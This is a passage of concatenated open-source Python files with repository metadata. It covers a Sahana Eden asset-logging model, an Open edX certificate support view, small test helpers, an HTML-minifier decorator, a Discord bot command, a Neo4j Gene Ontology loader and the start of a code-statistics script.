field=["item_id$item_category_id"], label=T("Category"), cols = 3 ), )) hierarchy = current.gis.get_location_hierarchy() report_fields = [ "number", (T("Category"), "item_id$item_category_id"), (T("Item"), "item_id"), (T("Facility/Site"), "site"), (hierarchy["L1"], "L1"), (hierarchy["L2"], "L2"), ] # Resource Configuration configure(tablename, super_entity=("supply_item_entity", "sit_trackable"), search_method = asset_search, report_filter=[ S3SearchLocationHierarchyWidget( name="asset_search_L1", field="L1", cols = 3 ), S3SearchLocationHierarchyWidget( name="asset_search_L2", field="L2", cols = 3 ), S3SearchOptionsWidget( name="asset_search_item_category", field=["item_id$item_category_id"], label=T("Category"), cols = 3 ), ], report_rows = report_fields, report_cols = report_fields, report_fact = report_fields, report_method=["count", "list"], list_fields=["id", "number", "item_id$item_category_id", "item_id", "type", "purchase_date", #"organisation_id", "location_id", "L0", "L1", #"L2", #"L3", "comments" ]) # Log as component of Assets add_component("asset_log", asset_asset="asset_id") # Vehicles as component of Assets add_component("vehicle_vehicle", asset_asset=dict(joinby="asset_id", multiple=False)) # GPS as a component of Assets add_component("vehicle_gps", asset_asset="asset_id") # ===================================================================== # Asset Log # asset_log_status_opts = {ASSET_LOG_SET_BASE : T("Base Facility/Site Set"), ASSET_LOG_ASSIGN : T("Assigned"), ASSET_LOG_RETURN : T("Returned"), ASSET_LOG_CHECK : T("Checked"), ASSET_LOG_REPAIR : T("Repaired"), ASSET_LOG_DONATED : T("Donated"), ASSET_LOG_LOST : T("Lost"), ASSET_LOG_STOLEN : T("Stolen"), ASSET_LOG_DESTROY : T("Destroyed"), } #site_or_location_opts = {SITE :T("Site"), # LOCATION :T("Location")} asset_condition_opts = { 1:T("Good Condition"), 2:T("Minor Damage"), 3:T("Major Damage"), 4:T("Un-Repairable"), 5:T("Needs Maintenance"), } tablename = "asset_log" table = define_table(tablename, asset_id(), Field("status", "integer", label = T("Status"), requires = IS_IN_SET(asset_log_status_opts), represent = lambda opt: \ asset_log_status_opts.get(opt, UNKNOWN_OPT) ), Field("datetime", "datetime", label = T("Date"), default=request.utcnow, requires = IS_EMPTY_OR(IS_UTC_DATETIME()), widget = S3DateTimeWidget(), represent = s3_date_represent, ), Field("datetime_until", "datetime", label = T("Date Until"), requires = IS_EMPTY_OR(IS_UTC_DATETIME()), widget = S3DateTimeWidget(), represent = s3_date_represent, ), person_id(label = T("Assigned To")), Field("check_in_to_person", "boolean", #label = T("Mobile"), # Relabel? label = T("Track with this Person?"), comment = DIV(_class="tooltip", #_title="%s|%s" % (T("Mobile"), _title="%s|%s" % (T("Track with this Person?"), T("If selected, then this Asset's Location will be updated whenever the Person's Location is updated."))), readable = False, writable = False), organisation_id(), # This is the Organisation to whom the loan is made #Field("site_or_location", # "integer", # requires = IS_NULL_OR(IS_IN_SET(site_or_location_opts)), # represent = lambda opt: \ # site_or_location_opts.get(opt, UNKNOWN_OPT), # widget = RadioWidget.widget, # label = T("Facility or Location")), site_id, room_id(), #location_id(), Field("cancel", # "boolean", default = False, label = T("Cancel Log Entry"), comment = DIV(_class="tooltip", _title="%s|%s" % (T("Cancel Log Entry"), T("'Cancel' will indicate an asset log entry did not occur"))) ), Field("cond", "integer", # condition is a MySQL reserved word requires = IS_IN_SET(asset_condition_opts, zero = "%s..." % T("Please select")), represent = lambda opt: \ asset_condition_opts.get(opt, UNKNOWN_OPT), label = T("Condition")), person_id("by_person_id", label = T("Assigned By"), # This can either be the Asset controller if signed-out from the store default = auth.s3_logged_in_person(), # or the previous owner if passed on directly (e.g. to successor in their post) comment = self.pr_person_comment(child="by_person_id"), ), comments(), *meta_fields()) table.site_id.label = T("Facility/Site") table.site_id.readable = True table.site_id.writable = True table.site_id.widget = None table.site_id.label = T("Facility/Site") table.site_id.comment = (DIV(_class="tooltip", _title="%s|%s" % (T("Facility/Site"), T("Enter some characters to bring up a list of possible matches")), ), SCRIPT(""" $(document).ready(function() { S3FilterFieldChange({ 'FilterField': 'organisation_id', 'Field': 'site_id', 'FieldPrefix': 'org', 'FieldResource': 'site', 'FieldID' : 'site_id', }); });""") ) # CRUD strings ADD_ASSIGN = T("New Asset Log Entry") # Change Label? LIST_ASSIGN = T("Asset Log") crud_strings[tablename] = Storage( title_create = ADD_ASSIGN, title_display = T("Asset Log Details"), title_list = LIST_ASSIGN, title_update = T("Edit Asset Log Entry"), title_search = T("Search Asset Log"), subtitle_create = ADD_ASSIGN, subtitle_list = T("Asset Log"), label_list_button = LIST_ASSIGN, label_create_button = ADD_ASSIGN, label_delete_button = T("Delete Asset Log Entry"), msg_record_created = T("Asset Log Entry created"), # Change Label? msg_record_modified = T("Asset Log Entry updated"), msg_record_deleted = T("Asset Log Entry deleted"), msg_list_empty = T("Asset Log Empty")) # Resource configuration configure(tablename, onvalidation = self.asset_log_onvalidation, onaccept = self.asset_log_onaccept, listadd = False, list_fields = ["id", "status", "datetime", "datetime_until", "organisation_id", #"site_or_location", "site_id", "room_id", #"location_id", "cancel", "cond", "comments"] ) # --------------------------------------------------------------------- # Pass variables back to global scope (response.s3.*) # return Storage( asset_asset_id = asset_id, asset_rheader = asset_rheader, asset_represent = self.asset_represent, asset_log_prep = self.asset_log_prep, ) # ------------------------------------------------------------------------- @staticmethod def defaults(): """ Return safe defaults for names in case the model is disabled """ asset_id = S3ReusableField("asset_id", "integer", writable=False, readable=False) return Storage(asset_asset_id=asset_id) # ------------------------------------------------------------------------- @staticmethod def asset_represent(id): """ """ db = current.db s3db = current.s3db messages = current.messages NONE = messages.NONE table = s3db.asset_asset itable = s3db.supply_item btable = s3db.supply_brand query = (table.id == id) & \ (itable.id == table.item_id) r = db(query).select(table.number, itable.name, btable.name, left = btable.on(itable.brand_id == btable.id), limitby=(0, 1)).first() if r: represent = "%s (%s" % (r.asset_asset.number, r.supply_item.name) if r.supply_brand.name: represent = "%s, %s)" % (represent, r.supply_brand.name) else: represent = "%s)" % represent else: represent = NONE return represent # ------------------------------------------------------------------------- @staticmethod def asset_log_onvalidation(form): """ """ request = current.request s3 = current.response.s3 status = int(request.post_vars.get("status", 0)) type = request.get_vars.get("type", None) #if status == asset_log_status["ASSIGN"] and type == "organisation": # Site or Location is required # if not form.vars.site_id and not form.vars.location_id: # response.error = T("The asset must be assigned to a site OR location.") # form.errors.site_or_location = T("Please enter a site OR a location") # ------------------------------------------------------------------------- @staticmethod def asset_log_onaccept(form): """ """ db = current.db s3db = current.s3db request = current.request s3 = current.response.s3 tracker = S3Tracker() ltable = s3db.asset_log vars = form.vars query = (ltable.id == vars.id) asset_id = db(query).select(ltable.asset_id, limitby=(0, 1)).first().asset_id current_log = asset_get_current_log(asset_id) status = int(vars.status or request.vars.status) request.get_vars.pop("status", None) type = request.get_vars.pop("type", None) vars.datetime = vars.datetime.replace(tzinfo=None) if vars.datetime and \ (not current_log.datetime or \ current_log.datetime <= vars.datetime): # This is a current assignment atable = s3db.asset_asset asset_tracker = tracker(atable, asset_id) if status == ASSET_LOG_SET_BASE: # Set Base Location asset_tracker.set_base_location(tracker(s3db.org_site, vars.site_id)) # Populate the address fields s3.address_update(atable, asset_id) if status == ASSET_LOG_ASSIGN: if type == "person":# if vars.check_in_to_person: asset_tracker.check_in(s3db.pr_person, vars.person_id, timestmp = vars.datetime) else: asset_tracker.set_location(vars.person_id, timestmp = vars.datetime) # Update main record for component query = (atable.id == asset_id) db(query).update(assigned_to_id=vars.person_id) elif type == "site": asset_tracker.check_in(s3db.org_site, vars.site_id, timestmp = vars.datetime) elif type == "organisation": #if vars.site_or_location == SITE: asset_tracker.check_in(s3db.org_site, vars.site_id, timestmp = vars.datetime) #if vars.site_or_location == LOCATION: # asset_tracker.set_location(vars.location_id, # timestmp = vars.datetime) if status == ASSET_LOG_RETURN: # Set location to base location asset_tracker.set_location(asset_tracker, timestmp = vars.datetime) return # ------------------------------------------------------------------------- @staticmethod def asset_log_prep(r): """ Called by Controller """ T = current.T db = current.db s3db = current.s3db request = current.request s3 = current.response.s3 table = s3db.asset_log if r.record: asset = Storage(r.record) else: # This is a new record asset = Storage() table.cancel.readable = False table.cancel.writable = False # This causes an error with the dataTables paginate # if used only in r.interactive & not also r.representation=="aadata" if r.method != "read" and r.method != "update": table.cancel.readable = False table.cancel.writable = False current_log = asset_get_current_log(asset.id) if request.vars.status: status = int(request.vars.status) else: status = 0 if status and status != "None": field = table.status field.default = status field.readable = False field.writable = False elif current_log: table.status.default = current_log.status crud_strings = s3.crud_strings.asset_log if status == ASSET_LOG_SET_BASE: crud_strings.subtitle_create = T("Set Base Facility/Site") crud_strings.msg_record_created = T("Base Facility/Site Set") table.by_person_id.label = T("Set By") table.site_id.writable = True table.site_id.requires = IS_ONE_OF(db, "org_site.id", table.site_id.represent) table.datetime_until.readable = False table.datetime_until.writable = False table.person_id.readable = False table.person_id.writable = False #table.site_or_location.readable = False #table.site_or_location.writable = False #table.location_id.readable = False #table.location_id.writable = False elif status == ASSET_LOG_RETURN: crud_strings.subtitle_create = T("Return") crud_strings.msg_record_created = T("Returned") table.person_id.label = T("Returned From") table.person_id.default = current_log.person_id #table.site_or_location.readable = False #table.site_or_location.writable = False table.site_id.readable = False table.site_id.writable = False #table.location_id.readable = False #table.location_id.writable = False elif status == ASSET_LOG_ASSIGN: type = request.vars.type # table["%s_id" % type].required = True if type == "person":# crud_strings.subtitle_create = T("Assign to Person") crud_strings.msg_record_created = T("Assigned to Person") table["person_id"].requires = IS_ONE_OF(db, "pr_person.id", table.person_id.represent, orderby="pr_person.first_name", sort=True, error_message="Person must be specified!") table.check_in_to_person.readable = True table.check_in_to_person.writable = True elif type == "site": crud_strings.subtitle_create = T("Assign to Facility/Site") crud_strings.msg_record_created = T("Assigned to Facility/Site") table["site_id"].requires = IS_ONE_OF(db, "org_site.site_id", table.site_id.represent) #field = table.site_or_location #field.readable = False #field.writable = False #field.default = SITE #table.location_id.readable = False #table.location_id.writable = False elif type == "organisation": crud_strings.subtitle_create = T("Assign to Organization") crud_strings.msg_record_created = T("Assigned to Organization") table["organisation_id"].requires = IS_ONE_OF(db, "org_organisation.id", table.organisation_id.represent, orderby="org_organisation.name", sort=True) #table.site_or_location.required = True elif "status" in request.get_vars: crud_strings.subtitle_create = T("Update Status") crud_strings.msg_record_created = T("Status Updated") table.person_id.label = T("Updated By") field = table.status field.readable = True field.writable = True field.requires = IS_IN_SET({ASSET_LOG_CHECK : T("Check"), ASSET_LOG_REPAIR : T("Repair"), ASSET_LOG_DONATED : T("Donated"), ASSET_LOG_LOST : T("Lost"), ASSET_LOG_STOLEN : T("Stolen"), ASSET_LOG_DESTROY : T("Destroyed"), }) # ============================================================================= def asset_get_current_log(asset_id): """ """ db = current.db s3db = current.s3db table = s3db.asset_log query = ( table.asset_id == asset_id ) & \ ( table.cancel == False ) & \ ( table.deleted == False ) # Get the log with the maximum time asset_log = db(query).select(table.id, table.status, table.datetime, table.cond, table.person_id, table.site_id, #table.location_id, orderby = ~table.datetime, limitby=(0, 1)).first() if asset_log: return Storage(datetime = asset_log.datetime, person_id = asset_log.person_id, cond = int(asset_log.cond or 0), status = int(asset_log.status or 0), site_id = asset_log.site_id, #location_id = asset_log.location_id ) else: return Storage() # ============================================================================= def asset_rheader(r): """ Resource Header for Assets """ if r.representation == "html": record = r.record if record: T = current.T s3db = current.s3db s3 = current.response.s3 NONE = current.messages.NONE if record.type == ASSET_TYPE_VEHICLE: tabs = [(T("Asset Details"), None), (T("Vehicle Details"), "vehicle"), (T("GPS Data"), "gps")] else: tabs = [(T("Edit Details"), None)] #elif record.type == s3.asset.ASSET_TYPE_RADIO: # tabs.append((T("Radio Details"), "radio")) #elif record.type == s3.asset.ASSET_TYPE_TELEPHONE: # tabs.append((T("Telephone Details"), "phone")) tabs.append((T("Log"), "log")) tabs.append((T("Documents"), "document")) rheader_tabs = s3_rheader_tabs(r, tabs) if current.request.controller == "vehicle": func = "vehicle" else: func = "asset" # @ToDo: Check permissions before displaying buttons asset_action_btns = [ A( T("Set Base Facility/Site"), _href = URL(f=func, args = [record.id, "log", "create"], vars = dict(status = ASSET_LOG_SET_BASE) ), _class = "action-btn" ) ] current_log = asset_get_current_log(record.id) status = current_log.status if record.location_id: # A Base Site has been set if status == ASSET_LOG_ASSIGN: asset_action_btns += [ A( T("Return"), _href = URL(f=func, args = [record.id, "log", "create"], vars = dict(status = ASSET_LOG_RETURN) ), _class = "action-btn" ) ] if status < ASSET_LOG_DONATED: # @ToDo: deployment setting to prevent assigning assets before returning them # The Asset is available for assignment (not disposed) asset_action_btns += [ A( T("Assign to Person"), _href = URL(f=func, args = [record.id, "log", "create"], vars = dict(status = ASSET_LOG_ASSIGN, type = "person") ), _class = "action-btn" ), A( T("Assign to Facility/Site"), _href = URL(f=func, args = [record.id, "log", "create"], vars = dict(status = ASSET_LOG_ASSIGN, type = "site") ), _class = "action-btn" ), A( T("Assign to Organization"), _href = URL(f=func, args = [record.id, "log", "create"], vars = dict(status = ASSET_LOG_ASSIGN, type = "organisation") ), _class = "action-btn" ), ] asset_action_btns += [ A( T("Update Status"), _href = URL(f=func, args = [record.id, "log", "create"], vars = None ), _class = "action-btn" ), ] table = r.table ltable = s3db.asset_log rheader = DIV(TABLE(TR( TH("%s: " % table.number.label), record.number, TH("%s: " % table.item_id.label), table.item_id.represent(record.item_id) ), TR( TH("%s: " % ltable.cond.label), ltable.cond.represent(current_log.cond), TH("%s: " % ltable.status.label), ltable.status.represent(status), ), TR( TH("%s: " % ltable.person_id.label), ltable.person_id.represent(current_log.person_id), TH("%s: " % ltable.site_id.label), ltable.site_id.represent(current_log.site_id), #TH("%s: " % ltable.location_id.label), # ltable.location_id.represent(current_log.location_id), ), ), DIV(_style = "margin-top:5px;", *asset_action_btns ), rheader_tabs ) return rheader return None # ============================================================================= class AssetVirtualFields: """ Virtual fields as dimension classes for reports """ def site(self): # The site of the asset try: location_id = self.asset_asset.location_id except AttributeError: # not available location_id = None if location_id: s3db = current.s3db stable = s3db.org_site query = (stable.location_id == location_id) site = current.db(query).select(stable.name, stable.site_id, stable.instance_type, limitby=(0, 1)).first() if site: return s3db.org_site_represent(site, link=False) return current.messages.NONE # END =========================================================================
flavour/iscram
modules/eden/asset.py
Python
mit
41,981
from typing import KeysView from baby_steps import given, then, when from district42 import optional, schema def test_dict_empty_keys(): with given: sch = schema.dict with when: res = sch.keys() with then: assert res == KeysView([]) def test_dict_keys(): with given: sch = schema.dict({ "id": schema.int, "name": schema.str, optional("email"): schema.str, }) with when: res = sch.keys() with then: assert res == KeysView(["id", "name", "email"])
nikitanovosibirsk/district42
tests/dict/test_dict_keys.py
Python
mit
572
""" Certificate end-points used by the student support UI. See lms/djangoapps/support for more details. """ import logging import urllib from functools import wraps import bleach from django.db import transaction from django.db.models import Q from django.http import HttpResponse, HttpResponseBadRequest, HttpResponseForbidden, HttpResponseServerError from django.utils.translation import gettext as _ from django.views.decorators.http import require_GET, require_POST from opaque_keys import InvalidKeyError from opaque_keys.edx.keys import CourseKey from common.djangoapps.student.models import CourseEnrollment, User from common.djangoapps.util.json_request import JsonResponse from lms.djangoapps.certificates.api import generate_certificate_task, get_certificates_for_user from lms.djangoapps.certificates.permissions import GENERATE_ALL_CERTIFICATES, VIEW_ALL_CERTIFICATES from lms.djangoapps.instructor_task.api import generate_certificates_for_students from openedx.core.djangoapps.content.course_overviews.api import get_course_overview_or_none log = logging.getLogger(__name__) def require_certificate_permission(permission): """ View decorator that requires permission to view and regenerate certificates. """ def inner(func): """ The outer wrapper, used to allow the decorator to take optional arguments. """ @wraps(func) def wrapper(request, *args, **kwargs): """ The inner wrapper, which wraps the view function. """ if request.user.has_perm(permission, 'global'): return func(request, *args, **kwargs) return HttpResponseForbidden() return wrapper return inner @require_GET @require_certificate_permission(VIEW_ALL_CERTIFICATES) def search_certificates(request): """ Search for certificates for a particular user OR along with the given course. Supports search by either username or email address along with course id. First filter the records for the given username/email and then filter against the given course id (if given). Show the 'Regenerate' button if a record found in 'generatedcertificate' model otherwise it will show the Generate button. Arguments: request (HttpRequest): The request object. Returns: JsonResponse Example Usage: GET /certificates/search?user=bob@example.com GET /certificates/search?user=bob@example.com&course_id=xyz Response: 200 OK Content-Type: application/json [ { "username": "bob", "course_key": "edX/DemoX/Demo_Course", "type": "verified", "status": "downloadable", "download_url": "http://www.example.com/cert.pdf", "grade": "0.98", "created": 2015-07-31T00:00:00Z, "modified": 2015-07-31T00:00:00Z } ] """ unbleached_filter = urllib.parse.unquote(urllib.parse.quote_plus(request.GET.get("user", ""))) user_filter = bleach.clean(unbleached_filter) if not user_filter: msg = _("user is not given.") return HttpResponseBadRequest(msg) try: user = User.objects.get(Q(email=user_filter) | Q(username=user_filter)) except User.DoesNotExist: return HttpResponseBadRequest(_("user '{user}' does not exist").format(user=user_filter)) certificates = get_certificates_for_user(user.username) for cert in certificates: cert["course_key"] = str(cert["course_key"]) cert["created"] = cert["created"].isoformat() cert["modified"] = cert["modified"].isoformat() cert["regenerate"] = not cert['is_pdf_certificate'] course_id = urllib.parse.quote_plus(request.GET.get("course_id", ""), safe=':/') if course_id: try: course_key = CourseKey.from_string(course_id) except InvalidKeyError: return HttpResponseBadRequest(_("Course id '{course_id}' is not valid").format(course_id=course_id)) else: course_overview = get_course_overview_or_none(course_key) if not course_overview: msg = _("The course does not exist against the given key '{course_key}'").format(course_key=course_key) return HttpResponseBadRequest(msg) certificates = [certificate for certificate in certificates if certificate['course_key'] == course_id] if not certificates: return JsonResponse([{'username': user.username, 'course_key': course_id, 'regenerate': False}]) return JsonResponse(certificates) def _validate_post_params(params): """ Validate request POST parameters to the generate and regenerate certificates end-point. Arguments: params (QueryDict): Request parameters. Returns: tuple of (dict, HttpResponse) """ # Validate the username try: username = params.get("username") user = User.objects.get(username=username) except User.DoesNotExist: msg = _("User {username} does not exist").format(username=username) return None, HttpResponseBadRequest(msg) # Validate the course key try: course_key = CourseKey.from_string(params.get("course_key")) except InvalidKeyError: msg = _("{course_key} is not a valid course key").format(course_key=params.get("course_key")) return None, HttpResponseBadRequest(msg) return {"user": user, "course_key": course_key}, None # Grades can potentially be written - if so, let grading manage the transaction. @transaction.non_atomic_requests @require_POST @require_certificate_permission(GENERATE_ALL_CERTIFICATES) def regenerate_certificate_for_user(request): """ Regenerate certificates for a user. This is meant to be used by support staff through the UI in lms/djangoapps/support Arguments: request (HttpRequest): The request object Returns: HttpResponse Example Usage: POST /certificates/regenerate * username: "bob" * course_key: "edX/DemoX/Demo_Course" Response: 200 OK """ # Check the POST parameters, returning a 400 response if they're not valid. params, response = _validate_post_params(request.POST) if response is not None: return response user = params["user"] course_key = params["course_key"] course_overview = get_course_overview_or_none(course_key) if not course_overview: msg = _("The course {course_key} does not exist").format(course_key=course_key) return HttpResponseBadRequest(msg) # Check that the user is enrolled in the course if not CourseEnrollment.is_enrolled(user, course_key): msg = _("User {user_id} is not enrolled in the course {course_key}").format( user_id=user.id, course_key=course_key ) return HttpResponseBadRequest(msg) # Attempt to regenerate certificates try: generate_certificate_task(user, course_key) except: # pylint: disable=bare-except # We are pessimistic about the kinds of errors that might get thrown by the # certificates API. This may be overkill, but we're logging everything so we can # track down unexpected errors. log.exception(f"Could not regenerate certificate for user {user.id} in course {course_key}") return HttpResponseServerError(_("An unexpected error occurred while regenerating certificates.")) log.info( f"Started regenerating certificates for user {user.id} in course {course_key} from the support page." ) return HttpResponse(200) @transaction.non_atomic_requests @require_POST @require_certificate_permission(GENERATE_ALL_CERTIFICATES) def generate_certificate_for_user(request): """ Generate certificates for a user. This is meant to be used by support staff through the UI in lms/djangoapps/support Arguments: request (HttpRequest): The request object Returns: HttpResponse Example Usage: POST /certificates/generate * username: "bob" * course_key: "edX/DemoX/Demo_Course" Response: 200 OK """ # Check the POST parameters, returning a 400 response if they're not valid. params, response = _validate_post_params(request.POST) if response is not None: return response course_overview = get_course_overview_or_none(params["course_key"]) if not course_overview: msg = _("The course {course_key} does not exist").format(course_key=params["course_key"]) return HttpResponseBadRequest(msg) # Check that the user is enrolled in the course if not CourseEnrollment.is_enrolled(params["user"], params["course_key"]): msg = _("User {username} is not enrolled in the course {course_key}").format( username=params["user"].username, course_key=params["course_key"] ) return HttpResponseBadRequest(msg) # Attempt to generate certificate generate_certificates_for_students( request, params["course_key"], student_set="specific_student", specific_student_id=params["user"].id ) return HttpResponse(200)
eduNEXT/edx-platform
lms/djangoapps/certificates/views/support.py
Python
agpl-3.0
9,360
from __future__ import absolute_import from __future__ import unicode_literals from compose.config.config import ConfigDetails from compose.config.config import ConfigFile from compose.config.config import load def build_config(contents, **kwargs): return load(build_config_details(contents, **kwargs)) def build_config_details(contents, working_dir='working_dir', filename='filename.yml'): return ConfigDetails( working_dir, [ConfigFile(filename, contents)], )
andrewgee/compose
tests/helpers.py
Python
apache-2.0
495
""" Copyright (c) 2013, Dave Mankoff All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of Dave Mankoff nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL DAVE MANKOFF BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """ from .main import Minifier def htmlmin(*args, **kwargs): """Minifies HTML that is returned by a function. A simple decorator that minifies the HTML output of any function that it decorates. It supports all the same options that :class:`htmlmin.minify` has. With no options, it uses ``minify``'s default settings:: @htmlmin def foobar(): return ' minify me! ' or:: @htmlmin(remove_comments=True) def foobar(): return ' minify me! <!-- and remove me! -->' """ def _decorator(fn): minify = Minifier(**kwargs).minify def wrapper(*a, **kw): return minify(fn(*a, **kw)) return wrapper if len(args) == 1: if callable(args[0]) and not kwargs: return _decorator(args[0]) else: raise RuntimeError( 'htmlmin decorator does accept positional arguments') elif len(args) > 1: raise RuntimeError( 'htmlmin decorator does accept positional arguments') else: return _decorator
mankyd/htmlmin
htmlmin/decorator.py
Python
bsd-3-clause
2,502
from __future__ import print_function from neo4j.v1 import GraphDatabase, basic_auth import os, sys import json import pickle import ipdb from tqdm import tqdm from infer_effects_go import Graph, GOgraph clear_string = ''' MATCH (n) DETACH DELETE n '''[1:-1] # DOMAIN MODEL # (:Annotation {go_id})-[: with open('go_graph.pkl', 'rb') as fp: go_graph = pickle.load(fp) # with open('go_graph_neo4j_input.csv', 'w') as fp: # print('child,relation,parent', file=fp) # for child, parents in tqdm(go_graph._rel_table.iteritems()): # for k, v in parents.iteritems(): # print('{0},{1},{2}'.format(child, v, k), file=fp) class GoGraphDatabase(object): def __init__(self, clear=False): self._driver = GraphDatabase.driver("bolt://127.0.0.1:7687/", auth=basic_auth("neo4j", "fffan77")) if clear: with self._driver.session() as session: session.run(clear_string) def add_term(self, go_id): with self._driver.session() as session: session.write_transaction(self.create_go_term_node, go_id) def add_rel_dep(self, go_id_1, go_id_2, rel_desc = 'IS_A'): if (not go_id_1) or (not go_id_2): return False with self._driver.session() as session: session.write_transaction(self.create_go_edge, goid1=go_id_1, goid2=go_id_2, rel_desc=rel_desc) def add_rel(self, go_id_1, go_id_2, rel_desc = 'is_a'): querystr = ("MATCH (g1:GoTerm {go_id: $go_id_1 }), (g2:GoTerm {go_id: $go_id_2 }) " "CREATE (g1)-[:%s]->(g2)") % rel_desc with self._driver.session() as session: session.run(querystr, go_id_1=go_id_1, go_id_2=go_id_2) @staticmethod def create_go_term_node(tx, go_id): tx.run("CREATE (a:GoTerm {go_id: $go_id})", go_id=go_id) @staticmethod def create_go_edge(tx, goid1, goid2, rel_desc): tx.run("MATCH (g1:GoTerm {go_id: $goid1 }), (g2:GoTerm {go_id: $goid2 }) CREATE (g1)-[:IS_A]->(g2)") g = GoGraphDatabase(clear = True) # first, create nodes for k in go_graph._graph.iterkeys(): g.add_term(k) # # now, create edges # for k, v in go_graph._graph.iteritems(): # for x in v: # print(k, x) # if x and k: # g.add_rel(go_id_1=k, go_id_2=x) # create edges with appropriate relationship info for k, v in go_graph._rel_table.iteritems(): for x, y in v.iteritems(): print(k, y, x) g.add_rel(go_id_1=k, go_id_2=x, rel_desc=y)
JDRomano2/VenomKB
venomkb/archive/scripts/build_neo4j_go_database.py
Python
gpl-2.0
2,593
import discord async def donate(cmd, message, args): if args: if args[0] == 'mini': mini = True else: mini = False else: mini = False sigma_image = 'https://i.imgur.com/mGyqMe1.png' sigma_title = 'Sigma Donation Information' patreon_url = 'https://www.patreon.com/ApexSigma' paypal_url = 'https://www.paypal.me/AleksaRadovic' support_url = 'https://discordapp.com/invite/aEUCHwX' if mini: response = discord.Embed(color=0x1B6F5F, title=sigma_title) donation_text = f'Care to help out? Come support Sigma on [Patreon]({patreon_url})!' response.description = donation_text else: response = discord.Embed(color=0x1B6F5F) donation_text = 'If you could spare some money, it would be amazing of you to support my work. ' donation_text += 'At the moment support from Sigma\'s users is my only source of income. ' donation_text += f'Come check out my [Patreon]({patreon_url}) and lend a hand! You also get some goodies! ' donation_text += f'Or if a subscription is too much commitment for you, how about [PayPal]({paypal_url})? ' donation_text += f'If you do end up being one of the lovely people to give support, ' donation_text += f'drop by our [Server]({support_url}) so we can properly thank you.' donation_text += f'\n**Thank you to the {len(cmd.bot.info.donors.donors)} donors who have provided support!**' response.set_author(name=sigma_title, icon_url=sigma_image, url=cmd.bot.cfg.pref.website) response.add_field(name='Care to help out?', value=donation_text) await message.channel.send(embed=response)
AXAz0r/apex-sigma-core
sigma/modules/help/donate.py
Python
gpl-3.0
1,698
#!/usr/bin/env python # # $Id: get_code_stats.py 9318 2011-06-10 02:37:10Z nathan_george $ # # Proprietary and confidential. # Copyright $Date:: 2011#$ Perfect Search Corporation. # All rights reserved. # import sys import os import re import optparse import math buildscriptDir = os.path.dirname(__file__) buildscriptDir = os.path.abspath(os.path.join(buildscriptDir, os.path.pardir)) sys.path.append(buildscriptDir) import sandbox import codescan import xmail import metadata from ioutil import * EXT_PAT = metadata.INTERESTING_EXT_PAT FROM = 'Code Stat Scanner <code.scan@example.com>' parser = optparse.OptionParser('Usage: %prog [options] [folder]\n\nCompiles stats about a code base; optionally emails report.') xmail.addMailOptions(parser) def getRelevantPaths(p): relevant = [] if not p.endswith('/'): relevant.append(p) while p: i = p.rfind('/') if i == -1: relevant.append('') break else: p = p[0:i+1] relevant.append(p) p = p[0:-1] return relevant def getValuesKeyName(key): return '[' + key + ']' def isValuesKeyName(key): return key[0] == '[' class StatsHolder: def __init__(self, rootPath): rootPath = norm_folder(rootPath) self.rootPath = rootPath self.statsByPath = {} self.statsByExtension = {} def getSandboxName(self): i = self.rootPath.find('/sandboxes/') if i != -1: x = self.rootPath[i + 11:] i = x.find('/code') if i > -1: x = x[0:i] i = x.rfind('/') if i > -1: x = x[0:i] return x else: return self.rootPath def getRelativePath(self, path): endsWithSlash = path.endswith('/') path = os.path.abspath(path).replace('\\', '/') # abspath() removes trailing slash; undo if endsWithSlash and path[-1] != '/': path = path + '/' return path[len(self.rootPath):] def addStat(self, path, statName, number): shouldAggregate = not path.endswith('/') if shouldAggregate: k = getValuesKeyName(statName) dict = self.statsByExtension ignored, ext = os.path.splitext(path) #print('ext = %s' % ext) #sys.exit(0) if not ext in dict: dict[ext] = {} dict = dict[ext] if not statName in dict: dict[statName] = number dict[k] = [number] else: dict[statName] = dict[statName] + number dict[k].append(number) relativePath = self.getRelativePath(path) sbp = self.statsByPath for p in getRelevantPaths(relativePath): if not p in sbp: sbp[p] = {} dict = sbp[p] if not statName in dict: dict[statName] = number if shouldAggregate: #print('aggregating %s for %s', (k, p)) dict[k] = [number] else: dict[statName] = dict[statName] + number if shouldAggregate: dict[k].append(number) _CPP_TESTNAME_PAT = re.compile(r'^\s*(SIMPLE_TEST\s*\(\s*(.*?)\s*\)|class\s+([a-zA-Z_0-9]+)\s*:\s*(public|protected|private)\s+[a-zA-Z_0-9]+Test)', re.MULTILINE | re.DOTALL) _JAVA_TESTNAME_PAT = re.compile(r'^\s*public\s+void\s+([a-zA-Z_0-9]+)\s*\(', re.MULTILINE | re.DOTALL) _PY_TESTNAME_PAT = re.compile(r'^\s*def test([a-zA-Z_0-9]+)\s*\(\s*self\s*\)\s*:', re.MULTILINE | re.DOTALL) _CPP_CLASS_PAT = re.compile(r'^\s*(template\s*<.*?>\s*)?(class|struct|union)\s+([a-zA-Z_0-9]+)', re.MULTILINE | re.DOTALL) _JAVA_CLASS_PAT = re.compile(r'^\s*((abstract|public|private|protected|static|final)\s+)*(class|interface)\s+([a-zA-Z_0-9]+)', re.MULTILINE | re.DOTALL) _PY_CLASS_PAT = re.compile(r'^\s*class\s+([a-zA-Z_0-9]+).*?:', re.MULTILINE | re.DOTALL) _TEST_FILE_PAT = re.compile(r'/test/', re.IGNORECASE) _CLASS_PATS = [_CPP_CLASS_PAT, 